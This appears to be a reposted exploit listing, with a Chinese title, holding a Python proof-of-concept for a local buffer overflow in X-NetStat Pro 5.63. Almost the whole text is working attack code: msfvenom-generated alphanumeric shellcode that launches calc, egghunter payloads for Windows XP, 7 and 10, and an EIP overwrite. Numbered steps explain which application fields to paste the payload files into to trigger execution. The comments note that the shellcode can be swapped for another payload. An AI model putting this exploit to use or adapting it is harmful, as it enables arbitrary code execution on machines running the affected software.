# X-NetStat Pro 5.63 本地緩衝區溢出漏洞
==EXP==
#!/usr/bin/env python #---------------------------------------------------------------------------------------------------------# # Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) # # Date: 2019-03-23 # # Author: Peyman Forouzan # # Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit # # Vendor Homepage: https://freshsoftware.com # # Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe # # Version: 5.63 # # Special Thanks to my wife # # The program has Local Buffer Overflow in several places. # # Note: Although there are even more simple codes to this vulnerability, # # this technique (EggHunter) has been used to run vulnerability in different windows versions. # # Steps : # # 1- Run python code : X-NetStat.py ( Three files are created ) # # 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" # # --> Enter --> Close HTTP Client window. # # 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt # # or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok # # --> Wait a litle --> Shellcode (Calc) open # # Also Instead of the third stage you can : # # File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt # # or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --> # # Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open # #---------------------------------------------------------------------------------------------------------# # "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite # #---------------------------------------------------------------------------------------------------------# #------------------------------------ EGG Shellcode Generation --------------------------------------- #msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg # ( Can be replaced with Shellcode ) egg = "w00tw00t" egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71" egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b" egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43" egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57" egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75" egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f" egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43" egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c" egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33" egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31" egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31" egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31" egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58" egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d" egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52" egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36" egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43" egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50" egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33" egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f" egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31" egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50" egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72" egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35" egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f" egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a" egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73" egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43" egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44" egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41" f = open ("egg.txt", "w") f.write(egg) f.close() #--------------------------------- EGG Hunter Shellcode Generation ----------------------------------- #encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters # EggHunter - Modified Version for Winxp and Win7 (32-64 bit) egghunter = "\x4c\x4c\x4c\x4c\x5f" egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47" egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41" egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c" egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38" egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63" egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f" egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50" egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d" egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56" egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44" egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54" egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75" egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70" egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51" egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41" # EggHunter - Modified Version for Windows10 (32-64 bit) egghunter10 = "\x4c\x4c\x4c\x4c\x5f" egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51" egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42" egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a" egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50" egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55" egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50" egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55" egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76" egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50" egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31" egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d" egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58" egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a" egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31" egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71" egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f" egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55" egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57" egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c" egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c" egghunter10 += "\x6b\x4f\x68\x67\x41\x41" eip = "\x77\x5a\x46" buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip # Direct Eip Overflow f = open ("egghunter-winxp-win7.txt", "w") f.write(buffer) f.close() buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip # Direct Eip Overflow f2 = open ("egghunter-win10.txt", "w") f2.write(buffer) f2.close()
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容